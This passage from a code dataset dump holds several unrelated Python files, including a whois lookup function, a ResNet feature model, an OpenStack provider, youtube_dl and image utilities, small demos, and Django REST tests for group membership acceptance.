is None:\n return doUnsupportedTldAnyway(\n tld,\n dl,\n ignore_returncode=ignore_returncode,\n slow_down=slow_down,\n server=server,\n verbose=verbose,\n )\n\n verifyPrivateREgistry(thisTld) # may raise WhoisPrivateRegistry\n server = doServerHintsForThisTld(tld, thisTld, server, verbose)\n\n slow_down = slow_down or SLOW_DOWN\n slow_down = doSlowdownHintForThisTld(tld, thisTld, slow_down, verbose)\n\n # if the tld is a multi level we should not move further down than the tld itself\n # we currently allow progressive lookups until we find something:\n # so xxx.yyy.zzz will try both xxx.yyy.zzz and yyy.zzz\n # but if the tld is yyy.zzz we should only try xxx.yyy.zzz\n\n cache_file = cache_file or CACHE_FILE\n tldLevel = tld.split(\".\") # note while the top level domain may have a . the tld has a _ ( co.uk becomes co_uk )\n while 1:\n whois_str = do_query(\n dl=dl,\n force=force,\n cache_file=cache_file,\n cache_age=cache_age,\n slow_down=slow_down,\n ignore_returncode=ignore_returncode,\n server=server,\n verbose=verbose,\n timeout=timeout,\n )\n tryMe = {\n \"Domain\": \".\".join(dl),\n \"rawData\": whois_str,\n \"server\": server,\n }\n LastWhois[\"Try\"].append(tryMe)\n\n data = do_parse(\n whois_str=whois_str,\n tld=tld,\n dl=dl,\n verbose=verbose,\n with_cleanup_results=with_cleanup_results,\n )\n\n # do we have a result and does it have a domain name\n if data and data[\"domain_name\"][0]:\n return Domain(\n data=data,\n whois_str=whois_str,\n verbose=verbose,\n include_raw_whois_text=include_raw_whois_text,\n )\n\n if len(dl) > (len(tldLevel) + 1):\n dl = dl[1:] # strip one element from the front and try again\n if verbose:\n print(f\"try again with {dl}, {len(dl)}, {len(tldLevel) + 1}\", file=sys.stderr)\n continue\n\n # no result or no domain but we can not reduce any further so we have None\n return None\n\n return None\n\n\n# Add get function to support return result in dictionary form\nget = result2dict(query)\n","sub_path":"whois/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"61221586","text":"# Copyright 2017-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the license found in the\n# LICENSE file in the root directory of this source tree.\n\n\nimport ResNetBasic\nimport torch\nimport torch.nn as nn\nfrom torch.nn.functional import cosine_similarity\nimport math\n\n# Modification of ResNet so that it also outputs a feature vector\nclass ResNetFeat(ResNetBasic.ResNet):\n def __init__(self, block, list_of_num_layers, list_of_out_dims, num_classes=1000, only_trunk=False,\n classifier_has_bias=True, is_cosine=False, attr_layer_min=None, attr_layer_max=None):\n super(ResNetFeat, self).__init__(block, list_of_num_layers, list_of_out_dims, num_classes, only_trunk)\n self.pre_layer = nn.Linear(self.final_feat_dim, self.final_feat_dim)\n self.avg_pool = [nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1),\n nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1),\n nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1),\n nn.AdaptiveAvgPool2d(1), nn.AdaptiveAvgPool2d(1)]\n\n if is_cosine:\n self.classifier = Cosine(self.final_feat_dim, num_classes)\n else:\n self.classifier = nn.Linear(self.final_feat_dim, num_classes, bias=classifier_has_bias)\n\n self.intermediate_features = {}\n\n def hook_features(module, input, output):\n device_id = output.get_device()\n self.intermediate_features[device_id].append(output)\n\n transforms = []\n if attr_layer_min is not None:\n for i in range(attr_layer_min, attr_layer_max):\n if self.trunk[i].outdim != self.final_feat_dim:\n transforms.append(nn.Linear(self.trunk[i].outdim, self.final_feat_dim))\n else:\n transforms.append(nn.Sequential())\n self.trunk[i].register_forward_hook(hook_features)\n self.transforms = nn.Sequential(*transforms)\n\n def forward(self, x):\n device_id = x.get_device()\n self.intermediate_features[device_id] = []\n\n out = self.trunk(x)\n\n intermediate_features_pooled = []\n for i in range(len(self.intermediate_features[device_id])):\n temp = self.avg_pool[i](self.intermediate_features[device_id][i]).view(self.intermediate_features[device_id][i].size(0), -1)\n temp = self.transforms[i](temp)\n intermediate_features_pooled.append(temp)\n\n out = out.view(out.size(0), -1)\n # linear layer without relu for training cosine classifier\n out = self.pre_layer(out)\n\n intermediate_features_pooled.append(out)\n\n scores = self.classifier(out)\n\n return scores, intermediate_features_pooled\n\n def get_classifier_weight(self):\n return self.classifier.weight\n\n def get_classifier(self):\n return self.classifier\n\n\ndef ResNet10(num_classes=1000, only_trunk=False, classifier_has_bias=False, is_cosine=False):\n return ResNetFeat(ResNetBasic.SimpleBlock, [1,1,1,1],[64,128,256,500], num_classes, only_trunk,\n classifier_has_bias=classifier_has_bias, is_cosine=is_cosine, attr_layer_min=7, attr_layer_max=7)\n\ndef ResNet18(num_classes=1000, only_trunk=False, classifier_has_bias=False, is_cosine=False):\n return ResNetFeat(ResNetBasic.SimpleBlock, [2,2,2,2],[64,128,256,500],num_classes, only_trunk,\n classifier_has_bias=classifier_has_bias, is_cosine=is_cosine, attr_layer_min=9, attr_layer_max=11)\n\ndef ResNet34(num_classes=1000, only_trunk=False, classifier_has_bias=False, is_cosine=False):\n return ResNetFeat(ResNetBasic.SimpleBlock, [3,4,6,3],[64,128,256,500], num_classes, only_trunk,\n classifier_has_bias=classifier_has_bias, is_cosine=is_cosine, attr_layer_min=9, attr_layer_max=19)\n\ndef ResNet50(num_classes=1000, only_trunk=False, is_cosine=False):\n return ResNetFeat(ResNetBasic.BottleneckBlock, [3,4,6,3], [256,512,1024,2048], num_classes, only_trunk,\n classifier_has_bias=False, is_cosine=is_cosine)\n\ndef ResNet101(num_classes=1000, only_trunk=False, is_cosine=False):\n return ResNetFeat(ResNetBasic.BottleneckBlock, [3,4,23,3],[256,512,1024,2048], num_classes, only_trunk,\n classifier_has_bias=False, is_cosine=is_cosine)\n\n\ndef get_model(model_name, num_classes, is_cosine=False):\n model_dict = dict(ResNet10 = ResNet10,\n ResNet18 = ResNet18,\n ResNet34 = ResNet34,\n ResNet50 = ResNet50,\n ResNet101 = ResNet101)\n return model_dict[model_name](num_classes, False, classifier_has_bias=False, is_cosine=is_cosine)\n\n\nclass Cosine(nn.Module):\n\n def __init__(self, in_features, out_features):\n super(Cosine, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.t = torch.ones(1).cuda() * 10\n self.weight = nn.Parameter(torch.Tensor(out_features, in_features))\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n\n def forward(self, input):\n batch_size = input.size(0)\n return self.t.cuda() * cosine_similarity(input.unsqueeze(1).expand(batch_size, self.out_features, self.in_features),\n self.weight.unsqueeze(0).expand(batch_size, self.out_features, self.in_features).cuda(), 2)\n\n def extra_repr(self):\n return 'in_features={}, out_features={}'.format(\n self.in_features, self.out_features\n )\n\n\n\n\n","sub_path":"ResNetFeat.py","file_name":"ResNetFeat.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"133449078","text":"\nimport time\n\nfrom novaclient.v1_1 import client as nova_client\nfrom cinderclient.v2 import client as cinder_client\nfrom keystoneclient.v2_0 import client as keystone_client\n\nfrom dtrove import config\nfrom .base import BaseProvider\n\n\nclass Provider(BaseProvider):\n\n def __init__(self):\n self.username = config.OS_USERNAME\n self.password = config.OS_PASSWORD\n self.project_id = config.OS_PROJECT_ID\n self.auth_url = config.OS_AUTH_URL\n self.region_name = 'IAD'\n self.endpoints = None\n self.auth_token = None\n\n def _auth(self):\n self.ks = keystone_client.Client(username=self.username,\n password=self.password,\n project_id=self.project_id,\n auth_url=self.auth_url)\n auth_ref = self.ks.auth_ref\n self.auth_token = auth_ref.auth_token\n self.endpoints = auth_ref.service_catalog.get_endpoints()\n\n def _poll(self, instance):\n while True:\n status, progress = self.update_status(instance)\n\n if status in ['active']:\n instance.progress = 100\n break\n elif status == \"error\":\n raise Exception(instance.message)\n\n time.sleep(5)\n\n def url(self, service):\n if self.endpoints is None:\n self._auth()\n\n service_endpoints = self.endpoints.get(service, [])\n for endpoint in service_endpoints:\n if endpoint.get('region', '') == self.region_name:\n return endpoint.get('publicURL')\n\n @property\n def nova(self):\n if self.auth_token is None:\n self._auth()\n return nova_client.Client(username=self.username,\n api_key=self.password,\n project_id=self.project_id,\n auth_token=self.auth_token,\n region_name=self.region_name,\n auth_url=self.auth_url,\n bypass_url=self.url('compute'))\n\n def update_status(self, instance):\n if not instance.server:\n return 'NA', 0\n obj = self.nova.servers.get(instance.server)\n\n status = getattr(obj, 'status', 'none').lower()\n progress = getattr(obj, 'progress', None) or 0\n\n if status == \"error\":\n instance.message = obj.fault['message']\n\n instance.server_status = status\n instance.progress = progress\n if not instance.addr:\n instance.addr = obj.accessIPv4\n instance.save()\n\n return status, progress\n\n def create_key(self, key):\n try:\n existing = self.nova.keypairs.get(key.name)\n except:\n self.nova.keypairs.create(name=key.name, public_key=key.public)\n\n def create(self, instance):\n cluster = instance.cluster\n datastore = cluster.datastore\n image = datastore.image\n key = instance.key\n # TODO: don't hard code this\n flavor = '3'\n # First create a keypair to log in with\n self.create_key(key)\n server = self.nova.servers.create(name=instance.name,\n image=image,\n flavor=flavor,\n key_name=key.name)\n time.sleep(3)\n server = self.nova.servers.get(server.id)\n instance.server = server.id\n instance.addr = server.accessIPv4\n instance.save()\n self._poll(instance)\n","sub_path":"dtrove/providers/openstack.py","file_name":"openstack.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"519101138","text":"from selenium import webdriver\r\n\r\nclass ExOfMethod():\r\n def Method(self):\r\n chrome_path = \"C:\\\\Users\\\\soumya.patil\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python37-32\\\\Drivers\\\\chromedriver.exe\"\r\n \r\n driver = webdriver.Chrome(chrome_path)\r\n \r\n #To maximize window use a maximiza method ,it is method because it uses ()\r\n driver.maximize_window()\r\n \r\n #get the base url using get method\r\n driver.get(\"https://stackoverflow.com/jobs\")\r\n \r\n #get the title using title\r\n t = driver.title\r\n print(\"The title of the page is :- \",t)\r\n \r\n #get current url\r\n CU = driver.current_url\r\n print(\"Current Url :- \",CU)\r\n \r\n #browser refresh\r\n driver.refresh()\r\n print(\"browser is refreshed\")\r\n \r\n #another way to refresh\r\n driver.get(driver.current_url)\r\n print(\"browser is again refreshed\")\r\n \r\n #go back\r\n driver.back()\r\n print(\"Go back one step in browser history\")\r\n \r\n #go forword\r\n driver.forward()\r\n print(\"Go forword one step in browser history\")\r\n \r\n #page source which means prints all the html code of a page\r\n #pageSourse = driver.page_source\r\n #print(pageSourse.encode(\"utf-8\"))\r\n \r\n \r\n driver.quit()\r\n \r\nEM = ExOfMethod()\r\nEM.Method() ","sub_path":"SeleniumTest/ExampleOfMethodNProperty.py","file_name":"ExampleOfMethodNProperty.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"359311726","text":"import io\nimport streamlit as st\nimport numpy as np\nimport wave\n\nst.title('Audio test')\n\n\ndef note(freq, length, amp, rate):\n t = np.linspace(0, length, length * rate)\n data = np.sin( 2 * np.pi * freq * t) * amp\n return data.astype(np.int16)\n\nfrequency = 440 # hertz\nnchannels = 1\nsampwidth = 2\nsampling_rate = 44100\nduration = 89 # Max size, given the bitrate and sample width\ncomptype = 'NONE'\ncompname = 'not compressed'\namplitude = 10000\nnframes = duration * sampling_rate\n\nx = st.text('Making wave...')\nsine_wave = note(frequency, duration, amplitude, sampling_rate)\n\nf = wave.open('sound.wav', 'w')\nf.setparams((nchannels, sampwidth, int(sampling_rate), nframes, comptype, compname))\n\nx.text('Converting wave...')\nf.writeframes(sine_wave)\n\nf.close()\n\nwith io.open('sound.wav', 'rb') as f:\n x.text('Sending wave...')\n x.audio(f)\n","sub_path":"examples/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"580291183","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport requests\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\n\nclass Url(models.Model):\n user = models.ForeignKey(User, related_name='urls', on_delete=models.CASCADE, null=True, blank=True)\n url = models.URLField(null=True, blank=True)\n status = models.IntegerField(null=True, blank=True)\n interval = models.IntegerField(default=30)\n active = models.BooleanField(default=True)\n created = models.DateTimeField(auto_now_add=True, null=True)\n updated = models.DateTimeField(auto_now=True, null=True)\n\n @property\n def get_status(self):\n if self.status not in [None, 0]:\n return f'{self.status}'\n return ''\n\n @property\n def get_status_color(self):\n if not self.get_status:\n return '#fc0909'\n else:\n return '#3efc05'\n\n def sync(self):\n if not self.active:\n print('not active')\n return\n\n try:\n r = requests.get(self.url, timeout=5)\n print(f'req: {self.url}')\n self.status = r.status_code\n self.save()\n except requests.exceptions.ConnectTimeout:\n print('ConnectTimeout')\n\n def __str__(self):\n verbose_name = self.url[:30]\n return f'[{self.get_status}] <{self.user.username}> <{verbose_name}>'\n","sub_path":"url_monitor/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"96261713","text":"from __future__ import unicode_literals\nfrom django.conf import settings\nimport youtube_dl, subprocess, PIL\nfrom PIL import Image\nfrom io import BytesIO\nimport datetime, json, re, logging, math, base64, random, string, os\nfrom django.core.files.storage import default_storage\nfrom django.core.files.base import ContentFile\n\n\nmp3bitrates = [32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320]\n\nclass YoutubeStuff():\n\turl = \"\"\n\tdef __init__(self,url):\n\t\tself.url = url\n\tdef getInfo(self):\n\t\tydl_opts = {\n\t\t\t\"forcejson\":True,\n\t\t\t\"simulate\":True,\n\t\t\t\"quiet\":True\n\t\t}\n\t\twith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n\t\t\tourinfo = ydl.extract_info(self.url,download=False)\n\t\treturn ourinfo\n\tdef getVideo(self,data,uformat,abit,folder,index,total):\n\t\tclass MyLogger(object):\n\t\t def debug(self, msg):\n\t\t print(msg)\n\n\t\t def warning(self, msg):\n\t\t print(msg)\n\n\t\t def error(self, msg):\n\t\t print(msg)\n\t\tydl_base = {\n\t\t\t\"restrictfilenames\":True,\n\t\t\t\"outtmpl\":settings.MEDIA_ROOT+\"/\"+folder+\"/%(title)s.%(ext)s\",\n\t\t\t\"logger\":MyLogger(),\n\t\t}\n\t\tif re.match(r'mkv|mp4|webm', uformat) is None:\n\t\t\tabit = min(mp3bitrates, key=lambda x:abs(x-abit))\n\t\t\tcombinedstr = str(data[1])\n\t\t\tydl_add = {\n\t\t\t\t\"format\":combinedstr,\n\t\t\t\t'extractaudio' : True,\n\t \t\t'audioformat' : uformat,\n\t \t\t'postprocessors': [{\n\t\t\t 'key': 'FFmpegExtractAudio',\n\t\t\t 'preferredcodec': uformat,\n\t\t\t 'preferredquality': str(abit),\n\t\t\t }]\n\t\t\t}\n\t\telse:\n\t\t\tcombinedstr = \"+\".join(data)\n\t\t\tydl_add = {\n\t\t\t\t\"format\":combinedstr,\n\t\t\t\t\"merge_output_format\":uformat\n\t\t\t}\n\t\tydl_opts = {}\n\t\tydl_opts.update(ydl_base)\n\t\tydl_opts.update(ydl_add)\n\t\twith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n\t\t\tthing = ydl.download([self.url])\n\nclass SaveStuff():\n\tdef __init__(self,img,filename):\n\t\tself.img = img\n\t\tself.filename = filename\n\tdef saveImage(self):\n\t\tdataUrlPattern = re.compile('data:image/(png|jpeg);base64,(.*)$')\n\t\tImageData = self.img\n\t\tImageData = dataUrlPattern.match(ImageData).group(2)\n\t\tprint(ImageData[0:256],len(ImageData))\n\t\timage_path = \"images/\"+self.filename\n\t\tfull_image_path = os.path.join(settings.MEDIA_ROOT, image_path)\n\t\tif os.path.isfile(full_image_path):\n\t\t\treturn image_path\n\t\twith open(full_image_path,\"wb\")as fh:\n\t\t\ttry:\n\t\t\t\tfh.write(base64.decodestring(bytes(ImageData)))\n\t\t\texcept:\n\t\t\t\tfh.write(base64.decodestring(bytes(ImageData,\"utf-8\")))\n\t\treturn image_path\n#No, I'm too fucking lazy at 5:37 AM to make it dataURL's I'm just going to save the damn fucking things because I'm tired of having to deal with it.\nclass DataImgCompress():\n\tdef __init__(self,imgdata):\n\t\tself.imgdata = imgdata\n\tdef tmpSaveImg(self):\n\t\tprint(os.getcwd())\n\t\trandomstr = ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.digits) for _ in range(24))+\".jpg\"\n\t\timage_path = settings.MEDIA_ROOT+\"/tmpimages/\"+randomstr\n\t\timg = Image.open(self.imgdata)\n\t\timg.save(image_path,quality=90,subsampling = 0)\n\t\treturn \"/media/tmpimages/\"+randomstr\n\n\n","sub_path":"ytdownload/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"212457011","text":"from operator import attrgetter\nimport os, codecs\n\nclass ErrorCode:\n def __init__(self, number=0, desc='', desc2='', er_files=[]):\n self.number = number\n self.desc = desc\n self.desc2 = desc2\n self.files = [er_files]\n def adding(self, er_files):\n #self.files += ', {}'.format(er_files)\n er_files = er_files[0]\n self.files.append(er_files)\n #self.files = self.files.split\n def __repr__(self):\n return('{} -> {} {} {}\\n'.format(self.number, self.desc, self.desc2, self.files))\n\ndef error_matrix():\n error_codes = open(\"error_codes.txt\", \"r\")\n error_array = []\n for lane in error_codes:\n lane = lane.strip().split(sep='#')\n error = ErrorCode(lane[0], lane[1], lane[2], lane[3])\n error_array.append(error)\n error_codes.close()\n #print(error_array[0])\n return error_array\n\ndef error_check(error_array):\n for error in error_array:\n #print(error[0])\n pass\n\ndef error_where(error_array):\n file = open(\"error_where.txt\", \"w+\")\n file_errors = open(\"error_list.csv\", \"w+\")\n first_lane = 'Error number Description Where\\n-----------------------------------------------------------\\n'\n file.write(first_lane)\n for error in error_array:\n file.write('{} -> {}\\n'.format(error.number, error.desc))\n file_errors.write('{}#{}#{}\\n'.format(error.number, error.desc, error.desc2))\n for x in range(len(error.files)):\n file.write(' {}. {}\\n'.format(x+1, error.files[x]))\n file.close()\n file_errors.close()\n\ndef save(error_array):\n file = open(\"sorted.txt\", \"w+\")\n first_lane = 'Error number Description Where\\n-----------------------------------------------------------\\n'\n file.write(first_lane)\n for error in error_array:\n file.write('{} -> {} {}\\n'.format(error.number, error.desc, error.files))\n file.close()\n\n\ndef error_code_link(error_array):\n linked = ErrorCode()\n linked_array = []\n x = -1\n for e in error_array:\n if x == -1:\n linked = e\n x = 0\n #print(linked.number)\n continue\n if (e.number != linked.number or e.desc != linked.desc):\n linked_array.append(linked)\n #print('{} {} {} {}'.format(linked.number, e.number, e.number != linked.number, e.desc != linked.desc))\n #print('[{}]\\n[{}]'.format(e.desc, linked.desc))\n linked = e\n #x += 1\n continue\n if e.number == linked.number or e.desc == linked.desc:\n linked.adding(e.files)\n continue\n return linked_array\n\n\n\nerror_array = error_matrix()\nsorted_e = sorted(sorted(error_array, key=attrgetter('desc')), key=attrgetter('number'))\nsave(sorted_e)\nlinked_e = error_code_link(sorted_e)\n#print(linked_e)\nerror_where(linked_e)","sub_path":"Error_search/where_are_errors.py","file_name":"where_are_errors.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"357998736","text":"book = {}\r\nbook ['tom'] = {\r\n 'name': 'tom',\r\n 'address': 'red, ny',\r\n 'phone': 3848372\r\n}\r\n\r\nbook ['bob'] = {\r\n 'name': 'bob',\r\n 'address':'green, ny',\r\n 'phone':353432\r\n}\r\n\r\nimport json\r\ns = json.dumps(book)\r\nprint(s)\r\nwith open('book.txt', 'w') as f:\r\n f.write(s)\r\n","sub_path":"json_example1.py","file_name":"json_example1.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"240806345","text":"import cv2\nimport os\nimport numpy as np\nfrom imutils.object_detection import non_max_suppression\n\n# define the path to the face detector\nFACE_DETECTOR_PATH = \"{base_path}/cascades/haarcascade_frontalface_alt.xml\".format(\n base_path=os.path.abspath(os.path.dirname(__file__)))\n\nimagePath = 'images/kids.png'\n\n# load the image and convert\nimage = cv2.imread(imagePath)\n\n\n# convert the image to grayscale, load the face cascade detector,\n# and detect faces in the image\ncimage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ndetector = cv2.CascadeClassifier(FACE_DETECTOR_PATH)\nrects = detector.detectMultiScale(cimage, scaleFactor=1.1, minNeighbors=5,\n minSize=(30, 30), flags=cv2.CASCADE_SCALE_IMAGE)\n\n# draw the final bounding boxes\nfor (xA, yA, xB, yB) in rects:\n cv2.rectangle(cimage, (xA, yA), (xB, yB), (0, 255, 0), 2)\n rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])\n pick = non_max_suppression(rects, probs=None, overlapThresh=0.65)\n\n # draw the final bounding boxes\n for (xA, yA, xB, yB) in pick:\n cv2.rectangle(cimage, (xA, yA), (xB, yB), (0, 255, 0), 2)\n\ncv2.imshow(\"After NMS\", cimage)\ncv2.waitKey(0)\n\n","sub_path":"src/face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"542479675","text":"from django.urls import reverse\nfrom django.contrib.auth.hashers import make_password\nfrom django.conf import settings\n\nfrom rest_framework import status\nfrom .base import APITestCaseExtended\nfrom restapi import models\n\nimport random\nimport string\nimport binascii\nimport os\n\n\nclass AcceptMembershipTest(APITestCaseExtended):\n \"\"\"\n Test to accept a membership (POST)\n \"\"\"\n def setUp(self):\n self.test_email = \"test@example.com\"\n self.test_email_bcrypt = \"a\"\n self.test_username = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@psono.pw'\n self.test_password = \"myPassword\"\n self.test_authkey = \"c55066421a559f76d8ed5227622e9f95a0c67df15220e40d7bc98a8a598124fa15373ac553ef3ee27c7\" \\\n \"123d6be058e6d43cc71c1b666bdecaf33b734c8583a93\"\n self.test_public_key = \"5706a5648debec63e86714c8c489f08aee39477487d1b3f39b0bbb05dbd2c649\"\n self.test_secret_key = \"a7d028388e9d80f2679c236ebb2d0fedc5b7b0a28b393f6a20cc8f6be636aa71\"\n self.test_secret_key_enc = \"77cde8ff6a5bbead93588fdcd0d6346bb57224b55a49c0f8a22a807bf6414e4d82ff60711422\" \\\n \"996e4a26de599982d531eef3098c9a531a05f75878ac0739571d6a242e6bf68c2c28eadf1011\" \\\n \"571a48eb\"\n self.test_secret_key_nonce = \"f580cc9900ce7ae8b6f7d2bab4627e9e689dca0f13a53e3c\"\n self.test_private_key = \"d636f7cc20384475bdc30c3ede98f719ee09d1fd4709276103772dd9479f353c\"\n self.test_private_key_enc = \"abddebec9d20cecf7d1cab95ad6c6394db3826856bf21c2c6af9954e9816c2239f5df697e52\" \\\n \"d60785eb1136803407b69729c38bb50eefdd2d24f2fa0f104990eee001866ba83704cf4f576\" \\\n \"a74b9b2452\"\n self.test_private_key_nonce = \"4298a9ab3d9d5d8643dfd4445adc30301b565ab650497fb9\"\n\n self.test_user_obj = models.User.objects.create(\n username=self.test_username,\n email=self.test_email,\n email_bcrypt=self.test_email_bcrypt,\n authkey=make_password(self.test_authkey),\n public_key=self.test_public_key,\n private_key=self.test_private_key_enc,\n private_key_nonce=self.test_private_key_nonce,\n secret_key=self.test_secret_key_enc,\n secret_key_nonce=self.test_secret_key_nonce,\n user_sauce='90272aaf01a2d525223f192aca069e7f5661b3a0f1b1a91f9b16d493fdf15295',\n is_email_active=True\n )\n\n self.test_email2 = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@example.com'\n self.test_email_bcrypt2 = \"b\"\n self.test_username2 = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@psono.pw'\n self.test_authkey2 = binascii.hexlify(os.urandom(settings.AUTH_KEY_LENGTH_BYTES)).decode()\n self.test_public_key2 = binascii.hexlify(os.urandom(settings.USER_PUBLIC_KEY_LENGTH_BYTES)).decode()\n self.test_private_key2 = binascii.hexlify(os.urandom(settings.USER_PRIVATE_KEY_LENGTH_BYTES)).decode()\n self.test_private_key_nonce2 = binascii.hexlify(os.urandom(settings.NONCE_LENGTH_BYTES)).decode()\n self.test_secret_key2 = binascii.hexlify(os.urandom(settings.USER_SECRET_KEY_LENGTH_BYTES)).decode()\n self.test_secret_key_nonce2 = binascii.hexlify(os.urandom(settings.NONCE_LENGTH_BYTES)).decode()\n self.test_user_sauce2 = 'a67fef1ff29eb8f866feaccad336fc6311fa4c71bc183b14c8fceff7416add99'\n\n self.test_user_obj2 = models.User.objects.create(\n username=self.test_username2,\n email=self.test_email2,\n email_bcrypt=self.test_email_bcrypt2,\n authkey=make_password(self.test_authkey2),\n public_key=self.test_public_key2,\n private_key=self.test_private_key2,\n private_key_nonce=self.test_private_key_nonce2,\n secret_key=self.test_secret_key2,\n secret_key_nonce=self.test_secret_key_nonce2,\n user_sauce=self.test_user_sauce2,\n is_email_active=True\n )\n\n self.test_group_obj = models.Group.objects.create(\n name = 'Test Group 1',\n public_key = 'a123',\n )\n\n self.test_membership_obj = models.User_Group_Membership.objects.create(\n user = self.test_user_obj,\n group = self.test_group_obj,\n creator = self.test_user_obj,\n secret_key = 'secret_key',\n secret_key_nonce = 'secret_key_nonce',\n secret_key_type = 'symmetric',\n private_key = 'private_key',\n private_key_nonce = 'private_key_nonce',\n private_key_type = 'symmetric',\n group_admin = True,\n accepted = True,\n )\n\n self.test_group_obj3 = models.Group.objects.create(\n name = 'Test Group 3',\n public_key = 'a123',\n )\n\n self.test_membership_obj3 = models.User_Group_Membership.objects.create(\n user = self.test_user_obj,\n group = self.test_group_obj3,\n creator = self.test_user_obj,\n secret_key = 'secret_key',\n secret_key_nonce = 'secret_key_nonce',\n secret_key_type = 'symmetric',\n private_key = 'private_key',\n private_key_nonce = 'private_key_nonce',\n private_key_type = 'symmetric',\n group_admin = True,\n accepted = False,\n )\n\n self.test_group_obj4 = models.Group.objects.create(\n name = 'Test Group 4',\n public_key = 'a123',\n )\n\n self.test_membership_obj4 = models.User_Group_Membership.objects.create(\n user = self.test_user_obj2,\n group = self.test_group_obj4,\n creator = self.test_user_obj,\n secret_key = 'secret_key',\n secret_key_nonce = 'secret_key_nonce',\n secret_key_type = 'symmetric',\n private_key = 'private_key',\n private_key_nonce = 'private_key_nonce',\n private_key_type = 'symmetric',\n group_admin = True,\n accepted = False,\n )\n\n self.test_group_obj5 = models.Group.objects.create(\n name = 'Test Group 5',\n public_key = 'a123',\n )\n\n self.test_membership_obj5 = models.User_Group_Membership.objects.create(\n user = self.test_user_obj,\n group = self.test_group_obj5,\n creator = self.test_user_obj,\n secret_key = 'secret_key',\n secret_key_nonce = 'secret_key_nonce',\n secret_key_type = 'symmetric',\n private_key = 'private_key',\n private_key_nonce = 'private_key_nonce',\n private_key_type = 'symmetric',\n group_admin = False,\n accepted = None,\n )\n\n def test_read_accept_membership(self):\n \"\"\"\n Tests GET method on membership_accept\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {}\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.get(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)\n\n def test_accept_failure_already_accepted_share(self):\n \"\"\"\n Tests to accept a membership that has already been accepted\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {\n 'membership_id': self.test_membership_obj.id,\n }\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.post(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_accept_failure_with_no_membership_id(self):\n \"\"\"\n Tests to accept a membership without a membership id\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {\n }\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.post(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_accept_failure_with_already_declined_membership(self):\n \"\"\"\n Tests to accept a membership with an already declined membership\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {\n 'membership_id': self.test_membership_obj3.id,\n }\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.post(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_accept_failure_of_membership_that_belongs_to_other_user(self):\n \"\"\"\n Tests to accept a membership that belongs to another user\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {\n 'membership_id': self.test_membership_obj4.id,\n }\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.post(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_accept_success(self):\n \"\"\"\n Tests to accept a membership with a not yet accepted membership\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {\n 'membership_id': self.test_membership_obj5.id,\n }\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.post(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_create_accept_membership(self):\n \"\"\"\n Tests PUT method on membership_accept\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {}\n\n 